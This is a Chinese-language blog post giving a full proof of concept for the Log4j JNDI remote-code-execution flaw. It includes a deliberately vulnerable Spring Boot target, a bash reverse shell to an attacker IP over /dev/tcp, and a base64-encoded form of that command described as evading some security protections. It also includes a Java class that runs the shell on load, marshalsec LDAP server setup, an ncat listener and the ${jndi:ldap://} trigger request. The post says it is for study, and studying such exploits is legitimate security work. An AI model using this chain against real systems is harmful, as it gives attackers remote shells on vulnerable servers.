ReZero's Utopia.

POC

Word count: 1kReading time: 5 min
2021/12/15 Share

本文仅供交流学习使用

Log4j

靶机

log4j 2.4.1, springboot应用

pom 中排除默认的springboot 日志(logback), 引入 log4j

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.1.3.RELEASE</version>
<relativePath/> <!-- lookup parent from repository -->
</parent>
<groupId>com.example</groupId>
<artifactId>log4j2_rce</artifactId>
<version>0.0.1-SNAPSHOT</version>
<name>log4j2_rce</name>
<description>log4j2_rce</description>
<properties>
<java.version>1.8</java.version>
</properties>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter</artifactId>
<exclusions>
<exclusion>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-logging</artifactId>
</exclusion>
</exclusions>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
<version>2.6.1</version>
<scope>compile</scope>
</dependency>
<!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.14.0</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.0</version>
</dependency>
</dependencies>

<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
</plugins>
</build>
</project>

模拟靶机环境,调用 log.error

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
@RestController
@SpringBootApplication
public class Demo1Application {

private static final Logger logger = LogManager.getLogger(Demo1Application.class);


public static void main(String[] args) {
SpringApplication.run(Demo1Application.class, args);
}

@GetMapping({"/s"})
public String hello(@RequestParam("payload") String payload) {
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
logger.error("{}", payload);
logger.info("{}", payload);
logger.info(payload);
logger.error(payload);
return payload;
}
}

直接启动靶机即可

攻击机

首先编译一个类,类中通过 static 块反弹shell,可以通过 b64编码绕过部分安全防护
bash -i >& /dev/tcp/192.168.137.156/7777 0>&1 =b64> YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMzcuMTU2Lzc3NzcgIDA+JjE=

反弹shell命令

1
2
3
4
5
6
7
8
9
# 目标是在靶机上执行该命令
bash -i >& /dev/tcp/Attacker_IP/7777 0>&1

# b64 编码
#
bash -c {echo,YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMzcuMTU2Lzc3NzcgIDA+JjE=}|{base64,-d}|{bash,-i}

# 攻击机监听端口
ncat -lvvp 7777

javac 后拿到 Inject.class

1
2
3
4
5
6
7
8
9
10
11
12
13
// javac Inject.java
public class Inject {

public Inject(){}
static {
try {
String[] cmd = {"/bin/bash", "-c", "{echo,YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMzcuMTU2Lzc3NzcgIDA+JjE=}|{base64,-d}|{bash,-i}"};
Runtime.getRuntime().exec(cmd);
} catch (Exception e) {
e.printStackTrace();
}
}
}

随便架一个资源服务,能暴露 Inject.class 即可,简单的方式就是对应目录下 python3 -m http.server port

最后我们在攻击机上搭建 ldap 服务,然后为上面这个资源服务做一个中转即可,目的是为了提供ldap协议支持

启动 ldap, 仓库地址
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "资源服务器路径/#Inject"

过程梳理

目前又一个资源服务器,只提供下载 Inject.class 的功能,Inject 类中static块加载时会触发 GetShell

靶机明显就是通过 log.error 漏洞加载这个 Inject.class,最终会被我们攻击机的 ncat 拿到反弹的 shell

所以我们向靶机发起 payload: GET http://localhost:8001/s?payload=${jndi:ldap://服务ldap路径/Inject}
触发它去加载远程的 ldap 服务转发资源服务Inject.class 从而直接触发 staticgetShell,
同时我们提前开启监听的ncat 就会捕获这个 shell

CATALOG
  1. 1. 本文仅供交流学习使用
    1. 1.1. Log4j
      1. 1.1.1. 靶机
      2. 1.1.2. 攻击机
      3. 1.1.3. 过程梳理